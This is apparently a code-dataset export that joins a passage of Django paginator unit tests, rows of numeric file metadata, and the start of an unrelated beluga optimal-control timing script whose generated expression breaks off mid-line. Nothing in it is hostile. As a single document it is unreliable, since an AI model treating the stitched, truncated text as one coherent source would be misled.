        # Non-unique field: the pk is passed as a tie-breaker.
        articles = Article.objects.all().order_by("-date", "-pk")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date")
        page_2 = paginator.page(
            value=list(articles)[20].date,
            pk=list(articles)[20].pk,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_1 = paginator.page(
            value=page_2[0].date,
            pk=page_2[0].pk,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_1), list(articles[:10]))

    def test_paginator_next_desc_non_unique(self):
        # Forward pagination with (value, pk) seek keys.
        articles = Article.objects.all().order_by("-date", "-pk")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date")
        page_1 = paginator.page(value=None, pk=None)
        self.assertListEqual(list(page_1), list(articles[:10]))
        page_2 = paginator.page(value=page_1[-1].date, pk=page_1[-1].pk)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_3 = paginator.page(value=page_2[-1].date, pk=page_2[-1].pk)
        self.assertListEqual(list(page_3), list(articles[20:]))

    def test_paginator_prev_asc_non_unique(self):
        # NOTE(review): despite the ``asc`` name this orders by "-date"/"-pk"
        # exactly like the desc variant above — looks copy-pasted; confirm
        # whether an ascending lookup_field was intended.
        articles = Article.objects.all().order_by("-date", "-pk")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date")
        page_2 = paginator.page(
            value=list(articles)[20].date,
            pk=list(articles)[20].pk,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_1 = paginator.page(
            value=page_2[0].date,
            pk=page_2[0].pk,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page_1), list(articles[:10]))

    def test_paginator_next_asc_non_unique(self):
        # NOTE(review): same as the desc variant — see note above on naming.
        articles = Article.objects.all().order_by("-date", "-pk")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date")
        page_1 = paginator.page(value=None, pk=None)
        self.assertListEqual(list(page_1), list(articles[:10]))
        page_2 = paginator.page(value=page_1[-1].date, pk=page_1[-1].pk)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_3 = paginator.page(value=page_2[-1].date, pk=page_2[-1].pk)
        self.assertListEqual(list(page_3), list(articles[20:]))

    def test_reverse_date_for_pk(self):
        """
        When the date increment does not match the pk increment,
        we should still get the right results.
        """
        Article.objects.all().delete()
        self.assertFalse(list(Article.objects.all()))
        # asc order date and desc order pk
        date = timezone.now()
        dates = reversed(
            [date + datetime.timedelta(seconds=seconds)
             for seconds in range(25)])
        for i, d in enumerate(dates):
            Article.objects.create(title="%s" % i, date=date, date_unique=d)
        articles = Article.objects.all().order_by("-date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page_1 = paginator.page(value=None)
        self.assertListEqual(list(page_1), list(articles[:10]))
        page_2 = paginator.page(value=page_1[-1].date_unique, pk=page_1[-1].pk)
        self.assertListEqual(list(page_2), list(articles[10:20]))
        page_3 = paginator.page(value=page_2[-1].date_unique, pk=page_2[-1].pk)
        self.assertListEqual(list(page_3), list(articles[20:]))
class PageTest(TestCase):
    """Tests the Page object's navigation helpers (next/prev keys, counts)."""

    def setUp(self):
        # 25 articles with strictly increasing ``date_unique`` values.
        date = timezone.now()
        for i in range(25):
            seconds = datetime.timedelta(seconds=i)
            Article.objects.create(title="%s" % i, date=date, date_unique=date + seconds)

    def test_next_page(self):
        # ``next_page()`` returns kwargs that fetch the following page.
        articles = Article.objects.all().order_by("date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="date_unique")
        page = paginator.page(value=None)
        self.assertListEqual(list(page), list(articles[:10]))
        page = paginator.page(**page.next_page())
        self.assertListEqual(list(page), list(articles[10:20]))
        page = paginator.page(**page.next_page())
        self.assertListEqual(list(page), list(articles[20:]))

    def test_prev_page(self):
        # ``prev_page()`` kwargs combined with PREV_PAGE walk backwards.
        articles = Article.objects.all().order_by("-date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(
            value=list(articles)[20].date_unique,
            move_to=inf_paginator.PREV_PAGE)
        self.assertListEqual(list(page), list(articles[10:20]))
        page = paginator.page(
            move_to=inf_paginator.PREV_PAGE,
            **page.prev_page())
        self.assertListEqual(list(page), list(articles[:10]))

    def test_next_objects_left(self):
        # Count of records after the current page; 0 on the last page.
        articles = Article.objects.all().order_by("-date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(value=None)
        self.assertEqual(
            page.next_objects_left(),
            len(articles[paginator.per_page:]))
        # last page
        page_last = paginator.page(
            value=list(articles)[-paginator.per_page].date_unique)
        self.assertEqual(page_last.next_objects_left(), 0)

    def test_prev_objects_left(self):
        # Count of records before the current page grows per page advanced.
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(value=None)
        self.assertEqual(page.prev_objects_left(), 0)
        page = paginator.page(**page.next_page())
        self.assertEqual(page.prev_objects_left(), paginator.per_page)
        page = paginator.page(**page.next_page())
        self.assertEqual(page.prev_objects_left(), paginator.per_page * 2)

    def test_next_pages_left(self):
        # 25 records / 10 per page => 2 further pages from the first.
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(value=None)
        self.assertEqual(page.next_pages_left(), 2)
        page = paginator.page(**page.next_page())
        self.assertEqual(page.next_pages_left(), 1)
        page = paginator.page(**page.next_page())
        self.assertEqual(page.next_pages_left(), 0)

    def test_prev_pages_left(self):
        # Mirror of next_pages_left while moving forward.
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(value=None)
        self.assertEqual(page.prev_pages_left(), 0)
        page = paginator.page(**page.next_page())
        self.assertEqual(page.prev_pages_left(), 1)
        page = paginator.page(**page.next_page())
        self.assertEqual(page.prev_pages_left(), 2)

    def test_has_next_page(self):
        # has_next() is True until the final page.
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="date_unique")
        page = paginator.page(value=None)
        self.assertTrue(page.has_next())
        page = paginator.page(**page.next_page())
        self.assertTrue(page.has_next())
        page = paginator.page(**page.next_page())
        self.assertFalse(page.has_next())

    def test_has_prev_page(self):
        # has_previous() is True until we seek back to the first page.
        articles = Article.objects.all().order_by("-date_unique")
        paginator = SeekPaginator(
            Article.objects.all(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(
            value=list(articles)[20].date_unique,
            move_to=inf_paginator.PREV_PAGE)
        self.assertTrue(page.has_previous())
        page = paginator.page(
            move_to=inf_paginator.PREV_PAGE,
            **page.prev_page())
        self.assertFalse(page.has_previous())

    def test_empty_first_page(self):
        # An empty queryset yields an empty page with neutral navigation.
        paginator = SeekPaginator(
            Article.objects.none(), per_page=10, lookup_field="-date_unique")
        page = paginator.page(value=None)
        self.assertFalse(list(page))
        self.assertFalse(page.has_next())
        self.assertFalse(page.has_previous())
        self.assertEqual(page.next_objects_left(), 0)
        self.assertEqual(page.prev_objects_left(), 0)
        self.assertEqual(page.next_pages_left(), 0)
        self.assertEqual(page.next_page(), {})
        self.assertEqual(page.prev_page(), {})
class SerializerTest(TestCase):
    """Round-trip tests for the page-key serializer."""

    @override_settings(USE_TZ=True)
    def test_page_key_to_page_key(self):
        """An aware UTC datetime round-trips through the page-key format."""
        moment = pytz.timezone('UTC').localize(datetime.datetime(
            year=2012, month=3, day=9, hour=22,
            minute=30, second=40, microsecond=123123))
        serialized = serializers.to_page_key(value=moment, pk=1)
        self.assertEqual(serialized, '1331332240.123123-1')
        decoded_dt, decoded_pk = serializers.page_key(serialized)
        self.assertEqual(decoded_dt, moment)
        self.assertEqual(decoded_pk, '1')

    @override_settings(USE_TZ=True, TIME_ZONE='America/Argentina/Buenos_Aires')
    def test_page_key_to_page_key_buenos_aires(self):
        """Serializing a non-UTC representation yields the same UTC key."""
        moment = pytz.timezone('UTC').localize(datetime.datetime(
            year=2012, month=3, day=9, hour=22,
            minute=30, second=40, microsecond=123123))
        local_zone = pytz.timezone('America/Argentina/Buenos_Aires')
        serialized = serializers.to_page_key(
            value=moment.astimezone(local_zone), pk=1)
        self.assertEqual(serialized, '1331332240.123123-1')
        decoded_dt, decoded_pk = serializers.page_key(serialized)
        self.assertEqual(decoded_dt, moment)
        self.assertEqual(decoded_pk, '1')

    @override_settings(USE_TZ=True)
    def test_page_key_to_page_key_tight_api(self):
        """Encode/decode compose cleanly, including the empty (None) key."""
        moment = pytz.timezone('UTC').localize(datetime.datetime(
            year=2012, month=3, day=9, hour=22,
            minute=30, second=40, microsecond=123123))
        roundtrip = serializers.to_page_key(
            *serializers.page_key(
                serializers.to_page_key(value=moment, pk=1)))
        self.assertEqual(roundtrip, '1331332240.123123-1')
        empty_roundtrip = serializers.to_page_key(
            *serializers.page_key(
                serializers.to_page_key(value=None, pk=None)))
        self.assertEqual(empty_roundtrip, '')

    @override_settings(USE_TZ=True)
    def test_to_page_key_microseconds(self):
        """Zero microseconds are padded to six digits in the key."""
        moment = pytz.timezone('UTC').localize(datetime.datetime(
            year=2012, month=3, day=9, hour=22,
            minute=30, second=40, microsecond=0))
        self.assertEqual(
            serializers.to_page_key(value=moment, pk=1),
            '1331332240.000000-1')

    @override_settings(USE_TZ=True)
    def test_page_key_microseconds(self):
        """A zero-microsecond key decodes back to the original datetime."""
        moment = pytz.timezone('UTC').localize(datetime.datetime(
            year=2012, month=3, day=9, hour=22,
            minute=30, second=40, microsecond=0))
        self.assertEqual(
            serializers.page_key(
                serializers.to_page_key(value=moment, pk=1)),
            (moment, '1'))

    @override_settings(USE_TZ=False)
    def test_page_key_to_page_key_naive(self):
        # The datetime naive version should work too,
        # but we can't compare the string key because
        # it vary depending on the platform
        naive_moment = datetime.datetime(
            year=2012, month=3, day=9, hour=22,
            minute=30, second=40, microsecond=123123)
        self.assertEqual(
            serializers.page_key(
                serializers.to_page_key(
                    *serializers.page_key(
                        serializers.to_page_key(value=naive_moment, pk=1)))),
            (naive_moment, '1'))
class PaginatorViewTest(TestCase):
    """End-to-end checks of the AJAX pagination view."""

    def setUp(self):
        base = timezone.now()
        for offset in range(25):
            Article.objects.create(
                title="%s" % offset,
                date=base,
                date_unique=base + datetime.timedelta(seconds=offset))

    def test_first_page(self):
        """With no page key the view returns the first 20 articles."""
        response = self.client.get(
            reverse('pagination-ajax'),
            HTTP_X_REQUESTED_WITH='XMLHttpRequest')
        payload = json.loads(response.content.decode('utf-8'))
        expected = Article.objects.all().order_by("-date", "-pk")
        self.assertEqual(
            payload['articles'],
            [{'title': article.title, } for article in expected[:20]])

    @override_settings(USE_TZ=False)
    def test_last_page(self):
        """Requesting past article 20 returns the remaining tail."""
        ordered = list(Article.objects.all().order_by("-date", "-pk"))
        marker = ordered[20]
        page_key = serializers.to_page_key(value=marker.date, pk=marker.pk)
        response = self.client.get(
            reverse('pagination-ajax') + '?p={}'.format(page_key),
            HTTP_X_REQUESTED_WITH='XMLHttpRequest')
        payload = json.loads(response.content.decode('utf-8'))
        self.assertEqual(
            payload['articles'],
            [{'title': article.title} for article in ordered[21:]])
| 41.897638
| 89
| 0.634968
| 2,021
| 15,963
| 4.806531
| 0.085601
| 0.060222
| 0.059502
| 0.077826
| 0.876673
| 0.850731
| 0.832716
| 0.79092
| 0.784641
| 0.773008
| 0
| 0.034751
| 0.233853
| 15,963
| 380
| 90
| 42.007895
| 0.759526
| 0.017666
| 0
| 0.721362
| 0
| 0
| 0.038289
| 0.003835
| 0
| 0
| 0
| 0
| 0.204334
| 1
| 0.089783
| false
| 0
| 0.034056
| 0
| 0.136223
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6b9969a4e5e3345fa3e9db7cd6f3886dc190cc9
| 71,701
|
py
|
Python
|
examples/Nolan/AFRL/Carts/SpeedTest9.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-03-26T03:00:03.000Z
|
2019-03-26T03:00:03.000Z
|
examples/Nolan/AFRL/Carts/SpeedTest9.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | null | null | null |
examples/Nolan/AFRL/Carts/SpeedTest9.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-07-14T22:53:52.000Z
|
2019-07-14T22:53:52.000Z
|
import numpy as np
from beluga.utils.math import *
from beluga.utils.tictoc import *
from numpy import pi
tf = 1
Dt = 0.1
sigv = 0.1
sigw = 0.1
sigr = 0.1
w = 3.1415/2
xb = 5
yb = 5
u_max = 0.1
v = 30
x_n = 100
y_n = 100
theta_n = 0.1
p11_n = 1
p12_n = 1
p13_n = 1
p22_n = 1
p23_n = 1
p33_n = 1
lamX_N = 50
lamY_N = -100
lamTHETA_N = 2
lamP11_N = 1
lamP12_N = 1
lamP13_N = 1
lamP22_N = 1
lamP23_N = 1
lamP33_N = 1
x_s = 1
y_s = 1
theta_s = 1
p11_s = 1e-3
p12_s = 1e-3
p13_s = 1e-3
p22_s = 1e-1
p23_s = 1e-2
p33_s = 1e-3
ep = 5
tic()
for i in range(1000):
fx = np.array([
(tf)*(-lamP11_N*(p11_n*p11_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + 
p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s 
- xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - 
yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - 
xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - 